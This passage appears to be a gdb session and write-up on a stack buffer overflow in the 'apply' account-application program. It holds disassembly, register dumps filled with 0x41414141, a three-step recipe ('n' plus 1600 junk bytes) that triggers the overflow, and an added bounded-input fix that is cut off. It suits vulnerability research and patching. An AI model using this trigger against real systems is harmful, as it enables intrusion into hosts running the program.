0x000115b8 <Acct+248>:  nop
0x000115bc <Acct+252>:  ld  [ %fp + -36 ], %g1
0x000115c0 <Acct+256>:  cmp  %g1, 0x70
0x000115c4 <Acct+260>:  be  0x11600 <Acct+320>
0x000115c8 <Acct+264>:  nop
0x000115cc <Acct+268>:  b  0x11658 <Acct+408>
0x000115d0 <Acct+272>:  nop
0x000115d4 <Acct+276>:  ld  [ %fp + -36 ], %g1
0x000115d8 <Acct+280>:  cmp  %g1, 0x78
0x000115dc <Acct+284>:  be  0x11618 <Acct+344>
0x000115e0 <Acct+288>:  nop
0x000115e4 <Acct+292>:  b  0x11658 <Acct+408>
0x000115e8 <Acct+296>:  nop
0x000115ec <Acct+300>:  ld  [ %fp + 0x44 ], %o0
0x000115f0 <Acct+304>:  call  0x132d0 <show_info>
0x000115f4 <Acct+308>:  nop
0x000115f8 <Acct+312>:  b  0x114f4 <Acct+52>
0x000115fc <Acct+316>:  nop
0x00011600 <Acct+320>:  sethi  %hi(0x25800), %g1
0x00011604 <Acct+324>:  or  %g1, 0x260, %o0     ! 0x25a60 <Acct_inst>
0x00011608 <Acct+328>:  call  0x13274 <blurb>
0x0001160c <Acct+332>:  nop
0x00011610 <Acct+336>:  b  0x114f4 <Acct+52>
0x00011614 <Acct+340>:  nop
0x00011618 <Acct+344>:  sethi  %hi(0x13c00), %g1
0x0001161c <Acct+348>:  or  %g1, 0x180, %o0     ! 0x13d80
0x00011620 <Acct+352>:  call  0x257d8 <printf@plt>
0x00011624 <Acct+356>:  nop
0x00011628 <Acct+360>:  sethi  %hi(0x13c00), %g1
0x0001162c <Acct+364>:  or  %g1, 0x1a8, %o0     ! 0x13da8
0x00011630 <Acct+368>:  call  0x12a30 <askyorn>
0x00011634 <Acct+372>:  nop
0x00011638 <Acct+376>:  mov  %o0, %g1
0x0001163c <Acct+380>:  cmp  %g1, 0
0x00011640 <Acct+384>:  be  0x114f4 <Acct+52>
0x00011644 <Acct+388>:  nop
0x00011648 <Acct+392>:  call  0x1320c <quit>
0x0001164c <Acct+396>:  nop
0x00011650 <Acct+400>:  b  0x114f4 <Acct+52>
0x00011654 <Acct+404>:  nop
0x00011658 <Acct+408>:  sethi  %hi(0x28c00), %g1
0x0001165c <Acct+412>:  or  %g1, 0x190, %g1     ! 0x28d90 <ibuf>
0x00011660 <Acct+416>:  ldub  [ %g1 ], %g1
0x00011664 <Acct+420>:  sll  %g1, 0x18, %g1
0x00011668 <Acct+424>:  sra  %g1, 0x18, %o5
0x0001166c <Acct+428>:  sethi  %hi(0x29000), %g1
0x00011670 <Acct+432>:  or  %g1, 0x2d1, %g1     ! 0x292d1 <_ctype+1>
0x00011674 <Acct+436>:  ldub  [ %o5 + %g1 ], %g1
0x00011678 <Acct+440>:  and  %g1, 0xff, %g1
0x0001167c <Acct+444>:  srl  %g1, 2, %g1
0x00011680 <Acct+448>:  and  %g1, 1, %g1
0x00011684 <Acct+452>:  cmp  %g1, 0
0x00011688 <Acct+456>:  be  0x11814 <Acct+852>
0x0001168c <Acct+460>:  nop
0x00011690 <Acct+464>:  sethi  %hi(0x28c00), %g1
0x00011694 <Acct+468>:  or  %g1, 0x190, %o0     ! 0x28d90 <ibuf>
0x00011698 <Acct+472>:  call  0x2582c <atoi@plt>
0x0001169c <Acct+476>:  nop
0x000116a0 <Acct+480>:  mov  %o0, %g1
0x000116a4 <Acct+484>:  st  %g1, [ %fp + -20 ]
0x000116a8 <Acct+488>:  ld  [ %fp + -20 ], %g1
0x000116ac <Acct+492>:  cmp  %g1, 0
0x000116b0 <Acct+496>:  ble  0x117fc <Acct+828>
0x000116b4 <Acct+500>:  nop
0x000116b8 <Acct+504>:  ld  [ %fp + -20 ], %g1
0x000116bc <Acct+508>:  cmp  %g1, 7
0x000116c0 <Acct+512>:  bg  0x117fc <Acct+828>
0x000116c4 <Acct+516>:  nop
0x000116c8 <Acct+520>:  ld  [ %fp + -20 ], %g1
0x000116cc <Acct+524>:  cmp  %g1, 7
0x000116d0 <Acct+528>:  bne  0x11708 <Acct+584>
0x000116d4 <Acct+532>:  nop
0x000116d8 <Acct+536>:  sethi  %hi(0x13c00), %g1
0x000116dc <Acct+540>:  or  %g1, 0x1d8, %o0     ! 0x13dd8
0x000116e0 <Acct+544>:  call  0x257d8 <printf@plt>
0x000116e4 <Acct+548>:  nop
0x000116e8 <Acct+552>:  sethi  %hi(0x13c00), %g1
0x000116ec <Acct+556>:  or  %g1, 0x208, %o0     ! 0x13e08
0x000116f0 <Acct+560>:  call  0x257d8 <printf@plt>
0x000116f4 <Acct+564>:  nop
0x000116f8 <Acct+568>:  call  0x1320c <quit>
0x000116fc <Acct+572>:  nop
0x00011700 <Acct+576>:  b  0x114f4 <Acct+52>
0x00011704 <Acct+580>:  nop
0x00011708 <Acct+584>:  sethi  %hi(0x25800), %g1
0x0001170c <Acct+588>:  or  %g1, 0x260, %o5     ! 0x25a60 <Acct_inst>
0x00011710 <Acct+592>:  ld  [ %fp + -20 ], %g1
0x00011714 <Acct+596>:  sll  %g1, 2, %g1
0x00011718 <Acct+600>:  add  %g1, %o5, %g1
0x0001171c <Acct+604>:  ld  [ %g1 + 0xc ], %g1
0x00011720 <Acct+608>:  st  %g1, [ %fp + -24 ]
0x00011724 <Acct+612>:  ld  [ %fp + -24 ], %g1
0x00011728 <Acct+616>:  add  %g1, 3, %g1
0x0001172c <Acct+620>:  st  %g1, [ %fp + -24 ]
0x00011730 <Acct+624>:  ld  [ %fp + 0x44 ], %g1
0x00011734 <Acct+628>:  add  %g1, 0x804, %g1
0x00011738 <Acct+632>:  st  %g1, [ %fp + -28 ]
0x0001173c <Acct+636>:  ld  [ %fp + -24 ], %g1
0x00011740 <Acct+640>:  ldub  [ %g1 ], %g1
0x00011744 <Acct+644>:  sll  %g1, 0x18, %g1
0x00011748 <Acct+648>:  sra  %g1, 0x18, %g1
0x0001174c <Acct+652>:  cmp  %g1, 0
0x00011750 <Acct+656>:  be  0x117c0 <Acct+768>
0x00011754 <Acct+660>:  nop
0x00011758 <Acct+664>:  ld  [ %fp + -24 ], %g1
0x0001175c <Acct+668>:  ldub  [ %g1 ], %g1
0x00011760 <Acct+672>:  sll  %g1, 0x18, %g1
0x00011764 <Acct+676>:  sra  %g1, 0x18, %o5
0x00011768 <Acct+680>:  sethi  %hi(0x29000), %g1
0x0001176c <Acct+684>:  or  %g1, 0x2d1, %g1     ! 0x292d1 <_ctype+1>
0x00011770 <Acct+688>:  ldub  [ %o5 + %g1 ], %g1
0x00011774 <Acct+692>:  and  %g1, 0xff, %g1
0x00011778 <Acct+696>:  srl  %g1, 3, %g1
0x0001177c <Acct+700>:  and  %g1, 1, %g1
0x00011780 <Acct+704>:  cmp  %g1, 0
0x00011784 <Acct+708>:  bne  0x117c0 <Acct+768>
0x00011788 <Acct+712>:  nop
0x0001178c <Acct+716>:  add  %fp, -28, %o2
0x00011790 <Acct+720>:  ld  [ %o2 ], %o5
0x00011794 <Acct+724>:  add  %fp, -24, %o4
0x00011798 <Acct+728>:  ld  [ %o4 ], %g1
0x0001179c <Acct+732>:  ldub  [ %g1 ], %o3
0x000117a0 <Acct+736>:  inc  %g1
0x000117a4 <Acct+740>:  st  %g1, [ %o4 ]
0x000117a8 <Acct+744>:  mov  %o5, %g1
0x000117ac <Acct+748>:  stb  %o3, [ %g1 ]
0x000117b0 <Acct+752>:  inc  %o5
0x000117b4 <Acct+756>:  st  %o5, [ %o2 ]
0x000117b8 <Acct+760>:  b  0x1173c <Acct+636>
0x000117bc <Acct+764>:  nop
0x000117c0 <Acct+768>:  ld  [ %fp + -28 ], %g1
0x000117c4 <Acct+772>:  clrb  [ %g1 ]
0x000117c8 <Acct+776>:  sethi  %hi(0x29400), %g1
0x000117cc <Acct+780>:  or  %g1, 0xdc, %g1      ! 0x294dc <action>
0x000117d0 <Acct+784>:  ld  [ %g1 ], %g1
0x000117d4 <Acct+788>:  cmp  %g1, 1
0x000117d8 <Acct+792>:  bne  0x117f0 <Acct+816>
0x000117dc <Acct+796>:  nop
0x000117e0 <Acct+800>:  sethi  %hi(0x25800), %g1
0x000117e4 <Acct+804>:  or  %g1, 0x2b4, %o0     ! 0x25ab4 <Acct_inst3>
0x000117e8 <Acct+808>:  call  0x13274 <blurb>
0x000117ec <Acct+812>:  nop
0x000117f0 <Acct+816>:  clr  [ %fp + -32 ]
0x000117f4 <Acct+820>:  b  0x1183c <Acct+892>
0x000117f8 <Acct+824>:  nop
0x000117fc <Acct+828>:  sethi  %hi(0x13c00), %g1
0x00011800 <Acct+832>:  or  %g1, 0x238, %o0     ! 0x13e38
0x00011804 <Acct+836>:  call  0x257d8 <printf@plt>
0x00011808 <Acct+840>:  nop
0x0001180c <Acct+844>:  b  0x114f4 <Acct+52>
0x00011810 <Acct+848>:  nop
0x00011814 <Acct+852>:  sethi  %hi(0x13c00), %g1
0x00011818 <Acct+856>:  or  %g1, 0x258, %o0     ! 0x13e58
0x0001181c <Acct+860>:  call  0x257d8 <printf@plt>
0x00011820 <Acct+864>:  nop
0x00011824 <Acct+868>:  sethi  %hi(0x25800), %g1
0x00011828 <Acct+872>:  or  %g1, 0x290, %o0     ! 0x25a90 <Acct_inst2>
0x0001182c <Acct+876>:  call  0x13274 <blurb>
0x00011830 <Acct+880>:  nop
0x00011834 <Acct+884>:  b  0x114f4 <Acct+52>
0x00011838 <Acct+888>:  nop
0x0001183c <Acct+892>:  ld  [ %fp + -32 ], %i0
0x00011840 <Acct+896>:  ret
0x00011844 <Acct+900>:  restore
End of assembler dump.
(gdb) Breakpoint 1 at 0x11840
(gdb) Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to -----, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing
the DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters
-- your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during
the review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)?

Enter your chosen login name.  It can be up to 8 characters long, and
should only use lowercase letters and digits.  Please use your first
initial and last name, as in jdoe, unless you have a strong preference
otherwise.

Login name?

Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.

Full name?

Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.

    **-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your
screen.  This is to protect your account.  To be sure you did not
mis-type anything, you will be asked to enter your password a second time.

Password:
Again:

Please describe yourself by choosing one of these menu items:

 1) ugrad     Undergraduate student enrolled in one or more CS courses
 2) grad      Graduate student enrolled in one or more CS courses
 3) alumni    Alumnus of Math and CS
 4) faculty   Member of the Math and CS faculty
 5) staff     Member of the Math and CS professional or classified staff
 6) crtsy     Courtesy account applicant that has spoken to the Sys Admin
 7) None of the above.  (This will abandon the application!)

Menu item number [1-7] or command [tpx?] :
You must select one of the choices.
Do you want to just forget the whole thing (y or n)?
Menu item number [1-7] or command [tpx?] :

Program received signal SIGSEGV, Segmentation fault.
0x00011588 in Acct ()
(gdb) Undefined command: "rx".  Try "help".
(gdb) Value can't be converted to integer.
[/code]
(gdb) g0 0x0 0 g1 0x31 49 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x28d90 167312 o1 0x28d92 167314 o2 0x2919e 168350 o3 0x1 1 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit---sp 0xffbefd40 0xffbefd40 o7 0x11510 70928 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 ---Type <return> to continue, or q <return> to quit---i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41414141 0x41414141 i7 0x41414141 1094795585 y 0x0 0 psr 0xfe001005 -33550331 wim 0x0 0 tbr 0x0 0 pc 0x11588 0x11588 <Acct+200> npc 0x1158c 0x1158c <Acct+204> fsr 0x0 0 csr 0x0 0 (gdb) (gdb) (gdb) Delete all breakpoints? (y or n) (gdb) Dump of assembler code for function askyorn: 0x00012a30 <askyorn+0>: save %sp, -1152, %sp 0x00012a34 <askyorn+4>: st %i0, [ %fp + 0x44 ] 0x00012a38 <askyorn+8>: clr [ %fp + -1044 ] 0x00012a3c <askyorn+12>: ld [ %fp + -1044 ], %g1 0x00012a40 <askyorn+16>: cmp %g1, 9 0x00012a44 <askyorn+20>: bg 0x12b20 <askyorn+240> 0x00012a48 <askyorn+24>: nop 0x00012a4c <askyorn+28>: sethi %hi(0x15000), %g1 0x00012a50 <askyorn+32>: or %g1, 0x328, %o0 ! 
0x15328 <_end+4039> 0x00012a54 <askyorn+36>: ld [ %fp + 0x44 ], %o1 0x00012a58 <askyorn+40>: call 0x257d8 <printf@plt> 0x00012a5c <askyorn+44>: nop 0x00012a60 <askyorn+48>: add %fp, -1040, %g1 ---Type <return> to continue, or q <return> to quit---0x00012a64 <askyorn+52>: mov %g1, %o0 0x00012a68 <askyorn+56>: call 0x25808 <gets@plt> 0x00012a6c <askyorn+60>: nop 0x00012a70 <askyorn+64>: ldub [ %fp + -1040 ], %g1 0x00012a74 <askyorn+68>: sll %g1, 0x18, %g1 0x00012a78 <askyorn+72>: sra %g1, 0x18, %g1 0x00012a7c <askyorn+76>: st %g1, [ %fp + -1052 ] 0x00012a80 <askyorn+80>: ld [ %fp + -1052 ], %g1 0x00012a84 <askyorn+84>: cmp %g1, 0x59 0x00012a88 <askyorn+88>: be 0x12ae0 <askyorn+176> 0x00012a8c <askyorn+92>: nop 0x00012a90 <askyorn+96>: ld [ %fp + -1052 ], %g1 0x00012a94 <askyorn+100>: cmp %g1, 0x59 0x00012a98 <askyorn+104>: bg 0x12ab8 <askyorn+136> ---Type <return> to continue, or q <return> to quit---0x00012a9c <askyorn+108>: nop 0x00012aa0 <askyorn+112>: ld [ %fp + -1052 ], %g1 0x00012aa4 <askyorn+116>: cmp %g1, 0x4e 0x00012aa8 <askyorn+120> be 0x12af0 <askyorn+192> 0x00012aac <askyorn+124>: nop 0x00012ab0 <askyorn+128>: b 0x12afc <askyorn+204> 0x00012ab4 <askyorn+132>: nop 0x00012ab8 <askyorn+136>: ld [ %fp + -1052 ], %g1 0x00012abc <askyorn+140>: cmp %g1, 0x6e 0x00012ac0 <askyorn+144>: be 0x12af0 <askyorn+192> 0x00012ac4 <askyorn+148>: nop 0x00012ac8 <askyorn+152>: ld [ %fp + -1052 ], %g1 0x00012acc <askyorn+156>: cmp %g1, 0x79 0x00012ad0 <askyorn+160>: be 0x12ae0 <askyorn+176> ---Type <return> to continue, or q <return> to quit---0x00012ad4 <askyorn+164>: nop 0x00012ad8 <askyorn+168>: b 0x12afc <askyorn+204> 0x00012adc <askyorn+172>: nop 0x00012ae0 <askyorn+176>: mov 1, %g1 ! 
0x1 0x00012ae4 <askyorn+180>: st %g1, [ %fp + -1048 ] 0x00012ae8 <askyorn+184>: b 0x12b24 <askyorn+244> 0x00012aec <askyorn+188>: nop 0x00012af0 <askyorn+192>: clr [ %fp + -1048 ] 0x00012af4 <askyorn+196>: b 0x12b24 <askyorn+244> 0x00012af8 <askyorn+200>: nop 0x00012afc <askyorn+204>: sethi %hi(0x15000), %g1 0x00012b00 <askyorn+208>: or %g1, 0x338, %o0 ! 0x15338 <_end+4055> 0x00012b04 <askyorn+212>: call 0x257d8 <printf@plt> 0x00012b08 <askyorn+216>: nop ---Type <return> to continue, or q <return> to quit---0x00012b0c <askyorn+220>: ld [ %fp + -1044 ], %g1 0x00012b10 <askyorn+224>: inc %g1 0x00012b14 <askyorn+228>: st %g1, [ %fp + -1044 ] 0x00012b18 <askyorn+232>: b 0x12a3c <askyorn+12> 0x00012b1c <askyorn+236>: nop 0x00012b20 <askyorn+240>: clr [ %fp + -1048 ] 0x00012b24 <askyorn+244>: ld [ %fp + -1048 ], %i0 0x00012b28 <askyorn+248>: ret 0x00012b2c <askyorn+252>: restore End of assembler dump. (gdb) Breakpoint 2 at 0x12b28 (gdb) Num Type Disp Enb Address What 2 breakpoint keep y 0x00012b28 <askyorn+248> (gdb) Delete all breakpoints? (y or n) (gdb) Breakpoint 3 at 0x12b28 (gdb) The program being debugged has been started already. Start it from the beginning? (y or n) Starting program: /home/bazz/latest/apply-1.2-stock/apply (no debugging symbols found) warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Welcome to ----, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. 
Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)? Breakpoint 3, 0x00012b28 in askyorn () (gdb) Continuing. Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? Please enter your full name. Be sure to use upper and lower case, as in John Q. Public. It is very important to get this right, as this is how your name will appear on lab access lists and in mail messages you send. Full name? Enter a password consisting of printable characters, spaces or tabs. It can be as long as you like, but only the first 8 characters matter. Do not use your login or real name in any form -- too easy to guess. **-*-* Do not give your password to anybody under any circumstances! *-*-** As you type in your password, characters will not be echoed to your screen. This is to protect your account. To be sure you did not mis-type anything, you will be asked to enter your password a second time. Password: Again: Please describe yourself by choosing one of these menu items: 1) ugrad Undergraduate student enrolled in one or more CS courses 2) grad Graduate student enrolled in one or more CS courses 3) alumni Alumnus of Math and CS 4) faculty Member of the Math and CS faculty 5) staff Member of the Math and CS professional or classified staff 6) crtsy Courtesy account applicant that has spoken to the Sys Admin 7) None of the above. (This will abandon the application!) Menu item number [1-7] or command [tpx?] : You must select one of the choices. Do you want to just forget the whole thing (y or n)? 
Breakpoint 3, 0x00012b28 in askyorn () (gdb) $ unknown mode: cooked $ $ $ $ $ $ (gdb) $ $ (gdb) $ $ $ $ exit (gdb) x/96x $sp 0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000 0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000 0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630 0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000 0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000 0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000 0xffbef930: 0x6e414141 0x41414141 0x41414141 0x41414141 0xffbef940: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef950: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef960: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef970: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef980: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) i r g0 0x0 0 g1 0x6e 110 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xffbef930 -4261584 o1 0xffbeff72 -4259982 o2 0x2919e 168350 o3 0x1 1 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit--- sp 0xffbef8c0 0xffbef8c0 o7 0x12a68 76392 l0 0x291a0 168352 l1 0x28d91 167313 l2 0xff000000 -16777216 l3 0xff0000 16711680 l4 0xff00 65280 l5 0x81000000 -2130706432 l6 0x7efefeff 2130640639 l7 0x81010100 -2130640640 i0 0x0 0 i1 
0x29190 168336 i2 0xff343a54 -13354412 i3 0x0 0 ---Type <return> to continue, or q <return> to quit--- i4 0xff33c008 -13385720 i5 0x0 0 fp 0xffbefd40 0xffbefd40 i7 0x11630 71216 y 0x0 0 psr 0xfe401005 -29356027 wim 0x0 0 tbr 0x0 0 pc 0x12b28 0x12b28 <askyorn+248> npc 0x12b2c 0x12b2c <askyorn+252> fsr 0x0 0 csr 0x0 0 (gdb) x/96x $sp 0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000 0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000 0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630 0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000 0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000 0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000 0xffbef930: 0x6e414141 0x41414141 0x41414141 0x41414141 0xffbef940: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef950: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef960: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef970: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef980: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) x/5i $pc 0x12b28 <askyorn+248>: ret 0x12b2c <askyorn+252>: restore 0x12b30 <mkpasswd>: save %sp, -136, %sp 0x12b34 <mkpasswd+4>: st %i0, [ %fp + 0x44 ] 0x12b38 <mkpasswd+8>: add %fp, -28, %g1 (gdb) si 0x00012b2c in askyorn () (gdb) 0x00011638 in Acct () (gdb) 
0x0001163c in Acct () (gdb) 0x00011640 in Acct () (gdb) $ ^M^Mj: not found $ unknown mode: cho $ ^M^M: not found $ $ ^M^M: not found $ stty cooked $ $ exit (gdb) x/5i $pc 0x11640 <Acct+384>: be 0x114f4 <Acct+52> 0x11644 <Acct+388>: nop 0x11648 <Acct+392>: call 0x1320c <quit> 0x1164c <Acct+396>: nop 0x11650 <Acct+400>: b 0x114f4 <Acct+52> (gdb) x/96x $sp 0xffbefd40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefda0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdd0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefde0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdf0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe10: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbefe20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe30: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) i r g0 0x0 0 g1 0x0 0 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x0 0 o1 0x29190 168336 o2 0xff343a54 -13354412 o3 0x0 0 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit--- sp 0xffbefd40 
0xffbefd40 o7 0x11630 71216 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 ---Type <return> to continue, or q <return> to quit--- i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41414141 0x41414141 i7 0x41414141 1094795585 y 0x0 0 psr 0xfe401001 -29356031 wim 0x0 0 tbr 0x0 0 pc 0x11640 0x11640 <Acct+384> npc 0x11644 0x11644 <Acct+388> fsr 0x0 0 csr 0x0 0 (gdb)
Often you can’t even see what you type, because the program turns echo off for some reason…. It gets tough: you cannot CTRL-C out of the session into GDB because the terminal is in raw mode, so I set a breakpoint:
b *0x00012b28
which is inside askyorn, just before its ret/restore. Note that it takes one more ret/restore, in the caller, before the overwritten return address is actually loaded.
I also had to put up with hitting that breakpoint once before the time I actually wanted it (not bad really, that’s lucky). Once I had a good breakpoint, I went through the program until it stopped there, then put my terminal back into cooked mode by invoking gdb’s shell command and running
stty cooked; stty echo;
That’s what let me get the readable gdb printouts back…
In summary, to get to this wonderful stack vulnerability location:
1) say you’re a new user
2) type in your name / username / password (twice), then hit ‘x’
3) at the ‘x’, send an ‘n’ without hitting CTRL-J, followed immediately by 1600 bytes of buffer trash.
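As an added example (not code from apply-1.2 or from the author), here is a bounded replacement for the y/n reader whose shape is visible in the askyorn disassembly above: the original calls gets() into a stack buffer at %fp-1040, which is why the ‘n’ plus 1600 bytes in step 3 runs straight into the caller’s saved register window, and the fix is to bound the read and throw away the rest of an over-long line. The function names, the FILE* parameters and the 1024-byte buffer size are my assumptions.

```c
/* Added example, not code from apply-1.2: a bounded y/n reader modelled on the
 * askyorn loop in the disassembly above (first byte Y/y -> 1, N/n -> 0, give up
 * after 10 bad answers).  The original's gets() into the buffer at %fp-1040 is
 * replaced by fgets() plus a drain of the tail of an over-long line.  Names,
 * FILE* parameters and the buffer size are assumptions, not the project's. */
#include <stdio.h>
#include <string.h>

#define YORN_BUF   1024   /* assumed size; the disassembly only shows the buffer starts at %fp-1040 */
#define YORN_TRIES 10     /* the counter at %fp-1044 gives up once it passes 9 */

/* Read one line into buf (at most size-1 chars).  If the line was longer than
 * the buffer, discard the rest so it cannot leak into the next prompt.
 * Returns 0 on EOF with nothing read, 1 otherwise. */
static int read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';                 /* whole line fit: strip newline */
    } else {
        int c;                               /* over-long line: eat the tail */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return 1;
}

/* Returns 1 for yes, 0 for no, -1 on EOF or after YORN_TRIES bad answers
 * (askyorn returns 0 in that case; -1 just keeps the outcomes distinct). */
int ask_yorn_safe(FILE *in, FILE *out, const char *prompt)
{
    char buf[YORN_BUF];
    for (int tries = 0; tries < YORN_TRIES; tries++) {
        fprintf(out, "%s (y or n)? ", prompt);
        if (!read_line_bounded(in, buf, sizeof buf))
            return -1;
        switch (buf[0]) {                    /* same first-byte test as askyorn+64 */
        case 'Y': case 'y': return 1;
        case 'N': case 'n': return 0;
        default:  fprintf(out, "Please answer y or n.\n");
        }
    }
    return -1;
}

/* Constructed input: 'n', 1600 junk bytes and a newline (the trigger from the
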